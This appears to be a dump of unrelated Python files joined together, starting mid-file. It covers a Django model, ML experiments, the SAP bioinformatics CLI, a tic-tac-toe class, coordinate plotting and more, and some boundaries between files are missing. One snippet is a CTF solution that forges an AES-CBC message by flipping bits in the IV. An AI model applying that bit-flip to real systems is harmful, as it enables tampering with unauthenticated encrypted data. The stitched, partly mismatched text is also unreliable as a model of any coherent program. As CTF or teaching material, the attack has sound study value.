    mcf = SolveMaxMatching(nworkers=nworkers, ntasks=ntasks, k=k, pairwise_lamb=pairwise_lamb)
    unary_potential = np.random.random([nworkers, ntasks])
    mcf_results = mcf.solve(unary_potential)
    objective = results2objective(results=mcf_results, nworkers=nworkers, ntasks=ntasks)
    print("unary potential :\n{}".format(unary_potential))
    print("objective :\n{}".format(objective))
if __name__ =='__main__':
    test1()
|
# Count 0..3: print 'hey' for the middle values (1, 2) and the number itself
# at the edges (0, 3); leaves i == 4 afterwards.
i = 0
while i < 4:
    if 1 <= i <= 2:
        print('hey')
    else:
        print(i)
    i += 1
|
from dataclasses import dataclass
from typing import Callable
class Car:
    """
    Generic car class: identification fields plus EV flag and battery range.
    """
    def __init__(self, name: str, released_year: int, manufacturer: str, is_ev: bool, battery_range: int):
        # Store each constructor argument verbatim as an instance attribute.
        for attr, value in (("name", name),
                            ("released_year", released_year),
                            ("manufacturer", manufacturer),
                            ("is_ev", is_ev),
                            ("battery_range", battery_range)):
            setattr(self, attr, value)
@dataclass
class CarSpecs:
    # Plain data carrier consumed by the factory builders below.
    name: str
    released_year: int
    manufacturer: str
    is_ev: bool
    battery_range: int  # range value; unit not specified in this file
class DummyCarFactory:
    """Naive car factory, kept alongside CarFactory for comparison."""
    @staticmethod
    def build(specs: CarSpecs):
        """
        Car builder method. To provide specs for the car and build it.
        🚧 If the car is an EV, we need to have battery range information.
        :return: a car instance
        """
        if specs.is_ev:
            return Car(specs.name, specs.released_year, specs.manufacturer, specs.is_ev, specs.battery_range)
        # BUG FIX: the non-EV branch used to call Car() without the required
        # battery_range argument, raising TypeError; default it to 0 to match
        # CarFactory.build_non_ev_car.
        return Car(specs.name, specs.released_year, specs.manufacturer, specs.is_ev, 0)
class CarFactory:
    """Builds Car instances, dispatching to an EV or non-EV builder."""
    def build(self, specs: CarSpecs, is_ev: bool):
        """Build a car from *specs*; *is_ev* selects which builder is used."""
        builder = self._get_builder(is_ev)
        return builder(specs)
    def _get_builder(self, is_ev: bool) -> Callable[[CarSpecs], Car]:
        # Dispatch on the flag rather than on specs.is_ev.
        return self.build_ev_car if is_ev else self.build_non_ev_car
    @staticmethod
    def build_non_ev_car(specs: CarSpecs) -> Car:
        # Non-EVs get a zero battery range regardless of specs.battery_range.
        return Car(specs.name, specs.released_year, specs.manufacturer, False, 0)
    @staticmethod
    def build_ev_car(specs: CarSpecs) -> Car:
        return Car(specs.name, specs.released_year, specs.manufacturer, True, specs.battery_range)
|
# Read a sentence and strip the punctuation characters , . " ' - !
string = input("Setning: ")
for mark in ',."\'-!':
    string = string.replace(mark, "")
print(string)
from django.db import models
# Create your models here.
class Currencies(models.Model):
    """Currency catalogue row.

    NOTE(review): every column — including isActive and both timestamps —
    is a CharField; BooleanField/DateTimeField would be more appropriate,
    but changing them requires a schema migration, so they are documented
    rather than altered here.
    """
    fullName = models.CharField(max_length=200)
    Sign = models.CharField(max_length=200)
    isActive = models.CharField(max_length=200)
    updated_at = models.CharField(max_length=200)
    created_at = models.CharField(max_length=200)
# Send a canned multi-line payload over UDP once per second
# (original comment: "发送广播" = "send broadcast").
from socket import *
import time
# Destination address (original comment: "广播地址" = "broadcast address").
dest=("localhost",6666)
s=socket(AF_INET,SOCK_DGRAM)
s.setsockopt(SOL_SOCKET,SO_BROADCAST,1)
# NOTE(review): the payload is a captured `ifconfig` transcript used as
# filler; it is sent verbatim and never parsed.
data="""asdfk
********************************
tarena@tarena:~$ ifconfig
enp2s0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
        inet 172.40.74.131 netmask 255.255.255.0 broadcast 172.40.74.255
        inet6 fe80::4105:814d:1719:4ae prefixlen 64 scopeid 0x20<link>
        ether fc:aa:14:37:99:51 txqueuelen 1000 (以太网)
        RX packets 62818 bytes 25438216 (25.4 MB)
        RX errors 0 dropped 0 overruns 0 frame 0
        TX packets 65809 bytes 10980720 (10.9 MB)
        TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
        inet 127.0.0.1 netmask 255.0.0.0
        inet6 ::1 prefixlen 128 scopeid 0x10<host>
        loop txqueuelen 1000 (本地环回)
        RX packets 28960 bytes 4685374 (4.6 MB)
        RX errors 0 dropped 0 overruns 0 frame 0
        TX packets 28960 bytes 4685374 (4.6 MB)
        TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
tarena@tarena:~$ ^C
tarena@tarena:~$
--------------------------------
"""
# Broadcast forever, one datagram per second.
while True:
    time.sleep(1)
    s.sendto(data.encode(),dest)
|
import pandas as pd
import numpy as np
import seaborn as sns
from matplotlib import pyplot as plt
from sklearn.svm import SVC
from sklearn.decomposition import PCA
from sklearn.metrics import confusion_matrix
def pca_dim_reduction(x_train, x_test, total_variance = 0.95):
    """
    Project train/test data onto PCA components fitted on the training set.
    Params:
        x_train -> zero-mean training data
        x_test -> (estimated) zero-mean test data
        total_variance -> fraction of total variance the kept components
            must explain; pass None to keep all components (no reduction).
    Output:
        Tuple of np.array: (transformed x_train, transformed x_test).
    Notes:
        The orthonormal basis is estimated from x_train only — x_test is
        treated as unseen data and merely projected onto that basis, so no
        information leaks from the test set into the transform.
    """
    basis = PCA(total_variance)
    basis.fit(x_train)
    return basis.transform(x_train), basis.transform(x_test)
if __name__ == '__main__':
    # Load the features; pull the label column (last one) out of each
    # target frame.
    x_train = pd.read_csv('X_Train.csv', index_col = 0)
    x_test = pd.read_csv('X_Test.csv', index_col = 0)
    y_train = pd.read_csv('Y_Train.csv', index_col = 0)
    y_train = y_train[y_train.columns[-1]]
    y_test = pd.read_csv('Y_Test.csv', index_col = 0)
    y_test = y_test[y_test.columns[-1]]
    # The three models differ only in the PCA variance kept and the output
    # file, so run them through a single loop instead of three copies.
    experiments = (
        ('M1', None, 'PCA1.npy'),      # keep all components
        ('M2', 0.99, 'PCA_0.99.npy'),  # keep 99% of total variance
        ('M3', 0.95, 'PCA_0.95.npy'),  # keep 95% of total variance
    )
    for label, variance, out_file in experiments:
        xr_train, xr_test = pca_dim_reduction(x_train, x_test, variance)
        clf = SVC()
        clf.fit(xr_train, y_train)
        y_pred = clf.predict(xr_test)
        CM = confusion_matrix(y_test, y_pred)
        # Save the row-normalized confusion matrix and report the accuracy
        # (sum of the diagonal over the total count).
        np.save(out_file, CM / np.sum(CM))
        print('%s) Average Accuracy = %s' % (label, np.sum(np.diag(CM)) / np.sum(CM)))
|
# Pull the native bindings into this package's namespace; _jep only exists
# when the interpreter is embedded in a JVM, hence the guarded import.
try:
    from _jep import *
except ImportError:
    raise ImportError("Jep is not supported in standalone Python, it must be embedded in Java.")
# Version metadata and the hooks that make Java classes importable.
from .version import __VERSION__, VERSION
from .java_import_hook import *
from .shared_modules_hook import *
|
# Standard libs:
import sys, re, os, pickle, copy, time, traceback, webbrowser
from optparse import OptionParser
from math import floor
from types import ListType
# BioPython modules:
from Bio.Nexus import Nexus, Trees, Nodes
from SAP import Fasta
# Custom modules:
from SAP import MachinePool, SGE, Options
from SAP.XML2Obj import XML2Obj
from SAP.Homology import HomolCompiler, HomologySet, Homologue
from SAP.TreeStatistics import TreeStatistics
from SAP.PairWiseDiffs import PairWiseDiffs
from SAP.ResultHTML import ResultHTML
from SAP.Initialize import Initialize
from SAP.UtilityFunctions import *
from SAP.FindPlugins import *
from SAP.InstallDependencies import assertClustalw2Installed, assertBlastInstalled
from SAP.PostAnalysis import IMa
from SAP.Exceptions import AnalysisTerminated
def sap():
    """Command-line entry point for the SAP pipeline (Python 2 code).

    Handles the utility modes (--viewresults, --compile,
    --installdependencies, --onlinehelp), the internal worker modes
    (--_align, --_sample, --_stats) that the pipeline re-invokes itself
    with, and otherwise runs the full analysis: per-record homologue
    search, then alignment / tree sampling / tree statistics sub-commands
    (run locally or queued on a MachinePool/SGE pool), followed by summary
    statistics and HTML report generation.
    """
    try:
        optionsParser = Options.Options()
        options, args = optionsParser.postProcess()
        if options.viewresults:
            try:
                webbrowser.open('file://' + os.path.abspath(os.path.join(options.viewresults, 'html', 'index.html')), new=2, autoraise=1)
            except:
                # NOTE(review): typos in the user-facing strings below
                # ("anlysis", "spcified") left untouched — they are runtime
                # output, not comments.
                if os.path.exists(options.viewresults):
                    print "The anlysis has not completed and no results are available."
                else:
                    print "The spcified project folder does not exist."
            sys.exit()
        if options.compile:
            if os.path.exists(options.database):
                print "Database already exists. Delete old database or use other name."
                sys.exit()
            from CompileDatabase import compileDatabase
            compileDatabase(options.compile, options.email, options.database)
            sys.exit()
        if options.installdependencies:
            # Only check for the external tools; automatic install is gone.
            print "Checking that dependencies are installed on your system."
            from UtilityFunctions import findOnSystem
            missing = False
            if os.name in ('nt', 'dos'):
                name = 'blastn.exe'
            else:
                name = 'blastn'
            if not findOnSystem(name):
                print "\nThis program depends on %s for searching databases. Automatic installation is not longer supported. You need to install this yourself from:\nftp.ncbi.nlm.nih.gov/blast/executables/blast+/LATEST\n\n" % name
                missing = True
            if os.name in ('nt', 'dos'):
                name = 'clustalw2.exe'
            else:
                name = 'clustalw2'
            if not findOnSystem(name):
                print "\nThis program depends on %s for aligning homologues. Automatic installation is not longer supported. You need to install this yourself from:\nftp.ebi.ac.uk/pub/software/clustalw2/2.0.8\n\n" % name
                missing = True
            if not missing:
                print "You should be good to go."
            # (dead assertClustalw2Installed/assertBlastInstalled check removed)
            return None
        if options.onlinehelp:
            webbrowser.open('http://kaspermunch.wordpress.com/statistical-assignment-package-sap/', new=2, autoraise=1)
            return None
        # Make a string of all options except of the ones with a '_'
        # prefix which are for internal use only:
        optionStr = ''
        for k, v in options.__dict__.items():
            if not re.match('_', k):
                if type(v) is ListType:
                    if len(v) > 0:
                        joinString = ' --%s ' % k
                        v = [repr(x) for x in v]
                        optionStr += joinString + joinString.join(v)
                elif v is True:
                    optionStr += ' --%s' % k
                elif v is not False:
                    optionStr += ' --%s %s' % (k, v)
        # Internal worker modes: the pipeline re-invokes `sap` with one of
        # these flags for each sub-task it schedules below.
        if options._align:
            try:
                plugin = findPlugin(options.alignment, 'sap.alignment')
            except PluginNotFoundError, X:
                raise AnalysisTerminated(1, "The plugin or file %s was not found." % X.plugin)
            aligner = plugin.Aligner(options)
            for fastaFileName in args:
                aligner.align(fastaFileName)
        elif options._sample:
            try:
                plugin = findPlugin(options.assignment, 'sap.assignment')
            except PluginNotFoundError, X:
                raise AnalysisTerminated(1, "The plugin or file %s was not found." % X.plugin)
            assignment = plugin.Assignment(options)
            for alignmentFileName in args:
                try:
                    assignment.run(alignmentFileName)
                except plugin.AssignmentError, X:
                    print X.msg
        elif options._stats:
            treeStatistics = TreeStatistics(options)
            treeStatistics.runTreeStatistics(args, generateSummary=False)
        # (disabled ghost-population IMa step removed; see VCS history)
        else:
            # Check that netblast and clustalw2 are installed:
            from UtilityFunctions import findOnSystem
            missing = False
            if os.name in ('nt', 'dos'):
                name = 'blastn.exe'
            else:
                name = 'blastn'
            if not findOnSystem(name):
                print "\nThis program depends on %s for searching databases. Automatic installation is not longer supported. You need to install this yourself from:\nftp.ncbi.nlm.nih.gov/blast/executables/blast+/LATEST\n\n" % name
                missing = True
            if os.name in ('nt', 'dos'):
                name = 'clustalw2.exe'
            else:
                name = 'clustalw2'
            if not findOnSystem(name):
                print "\nThis program depends on %s for aligning homologues. Automatic installation is not longer supported. You need to install this yourself from:\nftp.ebi.ac.uk/pub/software/clustalw2/2.0.8\n\n" % name
                missing = True
            if missing:
                return None
            # Make directories and write fixed inputfiles:
            init = Initialize(options)
            init.createDirs()
            # Fix the format of input files and copy them to the project directory:
            args, seqCount, sequenceNameMap = init.fixAndMoveInput(args)
            if not args or not seqCount:
                print "You need to specify file name of at least one non-empty sequence file in Fasta format."
                sys.exit()
            # Make sure cache is consistent with specified options:
            init.checkCacheConsistency(args)
            # NOTE(review): if neither hostfile nor sge is set, `pool` is
            # never bound — the code below only touches it under the same
            # conditions, so this holds as long as options are consistent.
            if options.hostfile:
                pool = MachinePool.MachinePool(options.hostfile)
            elif options.sge:
                pool = SGE.SGE(nodes=options.sge)
            fastaFileBaseNames = []
            uniqueDict = {}
            copyLaterDict = {}
            # (large commented-out thread-pool prototype removed; see VCS history)
            homolcompiler = HomolCompiler(options)
            inputQueryNames = {}
            # For each fasta file execute pipeline
            for fastaFileName in args:
                fastaFile = open(fastaFileName, 'r')
                fastaFileBaseName, suffix = os.path.splitext(os.path.basename(fastaFileName))
                fastaIterator = Fasta.Iterator(fastaFile, parser=Fasta.RecordParser())
                fastaFileBaseNames.append(fastaFileBaseName)
                inputQueryNames[fastaFileBaseName] = {}
                for fastaRecord in fastaIterator:
                    # Discard the header except for the first id word:
                    fastaRecord.title = re.search(r'^(\S+)', fastaRecord.title).group(1)
                    inputQueryNames[fastaFileBaseName][fastaRecord.title] = True
                    print "%s -> %s: " % (fastaFileBaseName, fastaRecord.title)
                    # See if the sequence is been encountered before and if so skip it for now:
                    if uniqueDict.has_key(fastaRecord.sequence):
                        copyLaterDict.setdefault(uniqueDict[fastaRecord.sequence], []).append('%s_%s' % (fastaFileBaseName, fastaRecord.title))
                        print '\tsequence double - skipping...\n'
                        continue
                    else:
                        uniqueDict[fastaRecord.sequence] = '%s_%s' % (fastaFileBaseName, fastaRecord.title)
                    # Find homologues: Fasta files and pickled homologyResult objects are written to homologcache
                    homologyResult = homolcompiler.compileHomologueSet(fastaRecord, fastaFileBaseName)
                    cmd = ''
                    if homologyResult != None:
                        # The homologyResult object serves as a job carrying the relevant information.
                        print '\tIssuing sub-tasks:'
                        # Alignment using ClustalW. (Reads the fasta files
                        # in homologcache and puts alignments in
                        # options.alignmentcache)
                        print "\t\tClustalW2 alignment"
                        cmd += "%s %s --_align %s ; " \
                            % ('sap', optionStr, os.path.join(options.homologcache, homologyResult.homologuesFileName))
                        print "\t\tTree sampling using", options.assignment
                        cmd += "%s %s --_sample %s ; " % ('sap', optionStr, os.path.join(options.alignmentcache, homologyResult.alignmentFileName))
                        # Calculation of tree statistics. (Reads pickled
                        # blastresult objects from homologcache and writes
                        # to options.treestatscache)
                        print "\t\tTree statistics computation"
                        cmd += "%s %s --_stats %s" % ('sap', optionStr, os.path.join(options.homologcache, homologyResult.homologuesPickleFileName))
                        # Escape parens so the shell does not interpret them.
                        cmd = cmd.replace('(', '\(').replace(')', '\)')
                        if options.hostfile or options.sge:
                            try:
                                pool.enqueue(cmd)
                            except SGE.QsubError:
                                print "Error in submission of %s" % cmd
                                pass
                        else:
                            if sys.platform == 'win32':
                                # Windows CMD won't take long command lines:
                                cmds = cmd.split(';')
                                for cmd in cmds:
                                    os.system(cmd)
                            else:
                                os.system(cmd)
                    # Output current status of parallel jobs
                    if options.hostfile or options.sge:
                        poolStatus(pool)
                    print ""
                fastaFile.close()
            if options.hostfile or options.sge:
                # Wait for all jobs to finish:
                pool.close()
                # Output current status of parallel jobs
                poolStatus(pool)
                print "\tPool closed"
            # Make dictionary to map doubles the ones analyzed:
            doubleToAnalyzedDict = {}
            for k, l in copyLaterDict.items():
                doubleToAnalyzedDict.update(dict([[v,k] for v in l]))
            if not options.nocopycache and len(doubleToAnalyzedDict):
                # Copy cache files for sequences that occoured more than once:
                print "Copying cached results for %d doubles" % len(doubleToAnalyzedDict)
                copyCacheForSequenceDoubles(copyLaterDict, options)
            # Calculate the pairwise differences between sequences in each file:
            if options.diffs:
                pairwisediffs = PairWiseDiffs(options)
                pairwisediffs.runPairWiseDiffs(args)
            # Summary tree stats:
            print 'Computing tree statistics summary...'
            treeStatistics = TreeStatistics(options)
            treeStatistics.runTreeStatistics(args, generateSummary=True, doubleToAnalyzedDict=doubleToAnalyzedDict, inputQueryNames=inputQueryNames)
            print "done"
            # Make HTML output:
            print '\tGenerating HTML output...'
            resultHTML = ResultHTML(options)
            resultHTML.webify([options.treestatscache + '/summary.pickle'], fastaFileBaseNames, doubleToAnalyzedDict, sequenceNameMap)
            print 'done'
    except SystemExit, exitVal:
        sys.exit(exitVal)
    except AnalysisTerminated, exe:
        print "\n\n", exe.msg
        sys.exit(exe.exitValue)
    # Catch-all: dump a traceback plus a request to mail debug info.
    except Exception, exe:
        print """
## SAP crashed, sorry ###################################################
Help creating a more stable program by sending all the debugging information
between the lines and your SAP version number to kaspermunch@gmail.com along
with *.sap file in the project folder and the sequence input file used.
"""
        print "".join(traceback.format_tb(sys.exc_info()[2]))
        print exe
        if hasattr(exe, 'msg'):
            print exe.msg
        print "#########################################################################"
"""
simulate fasta seqquences using simulation pipeline
write an estimation procedure for sap that collects IMa results in a table
from SAP.PostAnalysis import IMa
ima = IMa.Assignment(options)
ima._benchmark(args)
_benchmark should take a sequence file of for each of the two candidate species as extra arguments (instead of downloading them)
should return a table row with results
loop over parameter grid
call my old simulation script
run IMa on simulated alignment
simulate two categories:
two seqs from the same small/large population
two seqs from different small/large populations with small/large split time
assess how much it matters that we have to assume the ancestral Ne
Introduction
Introduction about assignmnet, previous work, barcoding, bold progress, nr of species in the world the problem with unsampled species/populations, our idea for addressing this, outline of the method.
Methods
About sap and the framework.
About the IMa2 model (sang chul)
How sap and ima2 interacts
About the benchmark analysis
About the example analysis on Flycatchers
Results
Benchmark analysis
Dependence on:
diversity/divergence (probability of ILS)
how often do we make a wrong high confidence assignment with sap, and how often is this caught correctly by IMa
how reliable is a low outgroup statistic in assuring us that the true species is in the database.
When the outgroup statistic is low, how often does that mean the true species is missing?
If the outgroup statistic is high it can be so correctly because the sequence is an outgroup to the other in the db sample - which occurs more often with a small number of sequences in the database. When the outgroup statistic is misleadingly high, how often will IMa assign to the candidate species?
How dependent is IMa of the number of candidate sequences in the analysis?
What if we took all bold entries in genbank and assigned them excluding the correct species. What fraction of assignments would be high confidence wrong ones?
Example analysis
Use Coasim with no recombination to simulate homology data sets to pass to alignment, assignment and IMa
Make a benchmark_sap function in Consolescripts sap as sap but with this functionality instead of normal input
Make a way to summarize the result information
from SimulationPipeline.SimulatePipeHotspotCTMC import simulateCoasim
assert os.path.exists(os.path.abspath(bppseqgenOptionsFile))
def spec(**args):
c1 = args["N1"] / args["NeRef"]
c2 = args["N2"] / args["NeRef"]
c3 = args["N3"] / args["NeRef"]
c12 = args["N12"] / args["NeRef"]
c123 = args["N123"] / args["NeRef"]
t1 = args["T1"] / args["g"] / (2*args["NeRef"])
t12 = args["T12"] / args["g"] / (2*args["NeRef"])
t123 = args["T123"] / args["g"] / (2*args["NeRef"])
speciesTree = P(c123, M(t12, [P(c3, S(1)), P(c12, M(t1, [P(c1, S(1)), P(c2, S(1))]))]))
return speciesTree
seq = simulateCoasim(spec, length=L, NeRef=NeRef, r=0, g=g, u=u, addOutGroup=addOutGroup, \
T1=T1, T12=T12, T123=T123, \
N1=N1, N2=N2, N3=N3, N12=N12, N123=N123, \
optionsFile=os.path.abspath(bppseqgenOptionsFile))
print >>tmpOutputFile, seq
# Make a summary data structure
homologyResult = HomologySet(queryName=queryName,
origQueryName=origQueryName,
queryFasta=fastaRecord,
blastRecord=None,
homologues={},
options=self.options)
taxonomy = Taxonomy()
taxonomy.populateFromString('family:munch,genus:kasper,species:me')
#populateFromString(self, str, fieldsep=',', subfieldsep=':'):
for gi in ...:
# Make a homology object:
homologue = Homologue(gi=gi,
sequence=sequence,
significance = 0,
taxonomy=taxonomy)
homologyResult.homologues.apppend(homologue)
"""
if __name__ == "__main__":
    # NOTE(review): only sap() is defined in this module; main() must come
    # from one of the star imports above (e.g. SAP.UtilityFunctions) —
    # confirm, otherwise this entry point raises NameError.
    main()
|
def f(x):
    """Objective function: x**2 + 2*x (factored form)."""
    return x * (x + 2)
def fdx(x):
    """First derivative of f: 2*x + 2 (factored form)."""
    return 2 * (x + 1)
# Midpoint (bisection) method: `fdx` is the derivative of the objective and
# `interval` the search bracket.  (Translated from the original Chinese
# comment: 中点法, f 为搜索的函数, fdx 为 f 的导函数, interval 为搜索的区间.)
def MidPointMethod(fdx,interval):
    """Locate the stationary point of the objective by bisecting `interval`
    on the sign of its derivative until |fdx(mid)| < 1e-8."""
    tolerance = 10**-8
    low = float(interval[0])
    high = float(interval[1])
    while True:
        midpoint = (low + high) / 2
        slope = fdx(midpoint)
        if abs(slope) < tolerance:
            return midpoint
        if slope > 0:
            high = midpoint   # minimum lies to the left of the midpoint
        else:
            low = midpoint    # minimum lies to the right of the midpoint
# Demo: minimize f(x) = x**2 + 2*x on [-3, 5]; the minimum is at x = -1.
if __name__ == "__main__":
    a = MidPointMethod(fdx,(-3,5))
    print(a)
|
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Input
from tensorflow.keras.applications import ResNet152V2
from tensorflow.keras.applications.resnet_v2 import preprocess_input
from . import _utils
MODEL_NAME = 'resnet152v2'
IMAGE_SIZE = 224
def load_model(model_version = 'default'):
    """Load a persisted resnet152v2 model via the shared _utils helper.

    :param model_version: version tag understood by _utils.load_model.
    """
    return _utils.load_model(MODEL_NAME, model_version)
def build_model(classes = 2):
    """Create and compile an untrained ResNet152V2 classifier.

    The graph takes raw 224x224 RGB images; ResNet-V2 preprocessing is
    embedded as the first layer, so callers feed unnormalized pixels.
    """
    raw_images = Input(shape = (IMAGE_SIZE, IMAGE_SIZE, 3))
    normalized = preprocess_input(raw_images)
    predictions = ResNet152V2(weights=None, classes=classes)(normalized)
    network = Model(inputs=raw_images, outputs=predictions)
    network.compile(loss='categorical_crossentropy', metrics=['accuracy'])
    return network
|
# Generated by Django 2.2 on 2021-06-18 12:43
from django.db import migrations, models
class Migration(migrations.Migration):
    """Adds the required `det` column to catanimal and re-declares `cat`."""
    dependencies = [
        ('produccion', '0008_auto_20210617_1959'),
    ]
    operations = [
        migrations.AddField(
            model_name='catanimal',
            name='det',
            # default=1 only backfills existing rows; preserve_default=False
            # then removes the default from the model definition.
            field=models.CharField(default=1, max_length=100, verbose_name='Nombre'),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name='catanimal',
            name='cat',
            field=models.CharField(max_length=10, verbose_name='Categoría'),
        ),
    ]
|
import pygame
import numpy as np
import tkMessageBox
import math
import collections
class Mark:
    """Mark class for the action of placing a mark on screen and checking for a win.

    Attributes:
        screen (pygame surface)
        length (int/float): radius for a circle or width for a line
        color (tuple): rgb color
        pos (tuple): center coordinates of the clicked grid cell
        pos_rot (tuple): coordinates after rotating the axes by 45 degrees
        pos_list (list of tuples): history of pos values
        pos_rot_list (list of tuples): history of pos_rot values
    """
    def __init__(self, screen, length, color=None, pos=None, pos_rot=None, pos_list=None, pos_rot_list=None):
        self.screen = screen
        self.length = length
        # PEP 8 (E711): compare against None with `is`, not `==`; fall back
        # to fresh empty containers so instances never share state.
        self.color = () if color is None else color
        self.pos = () if pos is None else pos
        self.pos_rot = () if pos_rot is None else pos_rot
        self.pos_list = [] if pos_list is None else pos_list
        self.pos_rot_list = [] if pos_rot_list is None else pos_rot_list
    def rotate_around_point_lowperf(self, radians=math.pi/4, origin=(0, 0)):
        """Rotate self.pos around `origin` by `radians` and cache the result.

        Adapted from Lyle Scott's gist:
        https://gist.github.com/LyleScott/e36e08bfb23b1f87af68c9051f985302

        Args:
            radians (float): rotation angle
            origin (tuple): rotation center
        Returns:
            tuple: the rotated coordinates (also stored in self.pos_rot)
        """
        x, y = self.pos
        ox, oy = origin
        qx = ox + math.cos(radians) * (x - ox) + math.sin(radians) * (y - oy)
        qy = oy + -math.sin(radians) * (x - ox) + math.cos(radians) * (y - oy)
        self.pos_rot = (qx, qy)
        return self.pos_rot
    def set_center(self):
        """Snap self.pos to the nearest grid center and record the move.

        Returns:
            tuple: (pos, pos_list, pos_rot_list) after appending the new
            center and its rotated image to the history lists.
        """
        center_points = np.array([[100, 300, 500], [100, 300, 500]])
        pos_arr = np.array([[self.pos[0]], [self.pos[1]]])
        idx = np.abs(center_points - pos_arr).argmin(axis=1)
        # NOTE(review): flat indexing with per-row argmin results only works
        # because both rows of center_points hold identical values — confirm
        # before changing the grid layout.
        center = center_points.flat[idx]
        self.pos = (center[0], center[1])
        self.pos_rot = self.rotate_around_point_lowperf()
        self.pos_list.append(self.pos)
        self.pos_rot_list.append(self.pos_rot)
        return self.pos, self.pos_list, self.pos_rot_list
    def check_game(self):
        """Check whether the current player has won.

        Returns:
            bool: False when three marks line up (stops the game loop),
            True otherwise (the game continues).
        """
        # Fewer than three marks can never win.
        if len(self.pos_list) < 3:
            return True
        def _counts(values):
            # Occurrence counts of each distinct value.
            return [count for _, count in collections.Counter(values).most_common()]
        # Three identical x or y centers => horizontal/vertical line;
        # three identical rotated (rounded) centers => diagonal line.
        if (3 in _counts(p[0] for p in self.pos_list)
                or 3 in _counts(p[1] for p in self.pos_list)
                or 3 in _counts(np.round(p[0], 0) for p in self.pos_rot_list)
                or 3 in _counts(np.round(p[1], 0) for p in self.pos_rot_list)):
            return False
        return True
|
# -*- coding: utf-8 -*-
"""
@author: Kotarou
"""
from entity import Component
from pyglet.window import key
from .KeyComponent import *
class KeyPressComponent(KeyComponent):
    """Key component that maps a pressed key to an action and parses it."""
    def __init__(self, actions):
        super().__init__()
        # Mapping from input key to its bound action; inactive until used.
        self.active = False
        self.actions = actions
    def respond(self, input):
        # Look up the action bound to this key and hand it to the parser.
        self.parse(self.actions[input])
|
'''
No Crypto (Crypto 200)
The folowing plaintext has been encrypted using an unknown key, with AES-128 CBC:
Original: Pass: sup3r31337. Don't loose it!
Encrypted: 4f3a0e1791e8c8e5fefe93f50df4d8061fee884bcc5ea90503b6ac1422bda2b2b7e6a975bfc555f44f7dbcc30aa1fd5e
IV: 19a9d10c3b155b55982a54439cb05dce
How would you modify it so that it now decrypts to: "Pass: notAs3cre7. Don't loose it!"
This challenge does not have a specific flag format.
'''
from Crypto.Cipher import AES
# Target plaintext we want the ciphertext to decrypt to, and the original.
problem = "Pass: notAs3cre7. Don't loose it!"
original = "Pass: sup3r31337. Don't loose it!"
# NOTE(review): str.decode("hex") is Python 2 only; bytes.fromhex on Py3.
encrypted = "4f3a0e1791e8c8e5fefe93f50df4d8061fee884bcc5ea90503b6ac1422bda2b2b7e6a975bfc555f44f7dbcc30aa1fd5e".decode("hex")
iv = "19a9d10c3b155b55982a54439cb05dce".decode("hex")
def xor_strings(xs, ys):
    """Character-wise XOR of two strings, truncated to the shorter one."""
    xored = []
    for a, b in zip(xs, ys):
        xored.append(chr(ord(a) ^ ord(b)))
    return "".join(xored)
# Show which bits differ between the two plaintexts.
print xor_strings(problem, original).encode("hex")
# Only the first 16-byte block is taken: XORing its difference into the IV
# flips exactly those bits in the first decrypted CBC block.
diff = xor_strings(problem[:16], original[:16])
print diff.encode("hex")
new_iv = xor_strings(iv,diff)
print new_iv.encode("hex")
#aes = AES.new(key, AES.MODE_CBC, iv).encrypt(original)
import math as m
import matplotlib.pyplot as plt
import numpy as np
import scipy.sparse as sp
from matplotlib.collections import LineCollection
from scipy import spatial
plt.rcParams['figure.figsize'] = [5, 3]
# Input data set and the neighbour-search radius used below.
filename = "SampleCoordinates.txt"
radius = 0.06
def read_coordinate_file(filename):
    """Read a text file of "{lat, long}" lines and return a 2xN array of
    Mercator-projected coordinates (row 0 = x from longitude, row 1 = y
    from latitude).

    (Translated from the original Swedish docstring.)
    """
    xs = []
    ys = []
    with open(filename) as fh:
        for raw in fh:
            # Strip the surrounding braces/newline, then project.
            lat, lon = raw.strip("{}\n").split(',')
            xs.append(float(lon) * m.pi / 180)
            ys.append(np.log(m.tan(m.pi / 4 + float(lat) * m.pi / 360)))
    return np.array((xs, ys))
# Parse the sample file once; reused by all calls below.
coord_list = read_coordinate_file(filename)
# print((read_coordinate_file(filename)))
def construct_graph_connections(coord_list, radius):
    """Return (indices, dist): every ordered pair of distinct points whose
    Euclidean distance is below `radius`, plus the matching distances.

    Note: both (i, j) and (j, i) are emitted, so the result is symmetric.
    (Translated from the original Swedish docstring.)
    """
    points = [(k, x, y) for k, (x, y) in enumerate(zip(coord_list[0], coord_list[1]))]
    indices = []
    dist = []
    # Brute-force all ordered pairs; O(n^2) but simple.
    for i, xi, yi in points:
        for j, xj, yj in points:
            if i == j:
                continue
            r = m.sqrt((xj - xi) ** 2 + (yj - yi) ** 2)
            if r < radius:
                indices.append([i, j])
                dist.append(r)
    return indices, dist
# BUG FIX: len(coord_list) is always 2 for the (x-row, y-row) layout that
# read_coordinate_file returns; the node count is the number of columns.
N = coord_list.shape[1]
# Run the O(n^2) neighbour search once instead of twice.
indices, distance = construct_graph_connections(coord_list, radius)
print(np.array(coord_list).T)
def construct_graph(indices, distance, N):
    """Build a sparse N x N CSR matrix with distance[k] at indices[k]."""
    mtx = sp.csr_matrix((distance, np.array(indices).T), shape=(N, N))
    return mtx
def plot_points(coord_list, indices):
    """Plot the coordinates, draw the connection lines and number each point.

    coord_list: 2xN array as returned by read_coordinate_file.
    indices: list of [i, j] index pairs to connect.
    """
    fig, ax = plt.subplots(1, figsize=(10, 6))
    fig.suptitle('Koordinater')
    sz = coord_list.shape[1]
    line = coord_list.T
    line = line[np.array(indices)]
    lines = LineCollection(line, linewidths=0.1, colors="b")
    n = np.linspace(1, sz, sz)
    # BUG FIX: use the coord_list argument directly — the original re-read
    # `filename` here, silently ignoring the parameter it was given.
    coord_x, coord_y = np.split(coord_list, 2)
    ax.add_collection(lines)
    plt.scatter(coord_x, coord_y)  # plot the given coordinates
    coord_x = coord_x.reshape(sz, 1)
    coord_y = coord_y.reshape(sz, 1)
    for k, txt in enumerate(n):
        plt.annotate(txt-1, (coord_x[k], coord_y[k]))  # number each point
    plt.show()
plot_points(read_coordinate_file(filename), indices)
|
import cv2
import pickle
# Inspect training samples whose ground-truth string is suspiciously long:
# print the label and show the image, waiting for a key between samples.
data = pickle.load(open("/Users/balazs/real_data/data_training.pkl", 'rb'))
for image, truth in data:
    if len(truth) > 50:
        print(truth)
